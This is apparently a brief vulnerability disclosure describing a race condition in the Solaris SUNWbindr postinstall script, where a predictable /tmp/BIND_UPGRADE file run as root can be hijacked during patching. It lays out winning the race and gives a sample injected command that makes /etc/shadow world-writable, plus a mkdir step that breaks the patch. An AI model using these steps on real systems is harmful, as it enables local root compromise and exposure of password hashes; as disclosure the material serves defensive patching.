There is a race condition with the postinstall script for SUNWbindr that if update manager is being used or
smpatch while the system is in multi user mode could lead to arbitrary code execution as root.
rm -f $UPGRADE
(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)
cat >> $UPGRADE <<-\_UPDATE_START_METHOD
oset=$@ # Remember current options if any.
if [ -z "$TMP" ]; then
echo "chmod 777 /etc/shadow" >> /tmp/BIND_UPGRADE;
Or repeatedly touching the file and checking for write permission with the existence of the string BIND_UPGRADE in its contents would
also mean you won the race. Then inject malicious code.
At the least you can break the patch by creating a directory
# mkdir /tmp/BIND_UPGRADE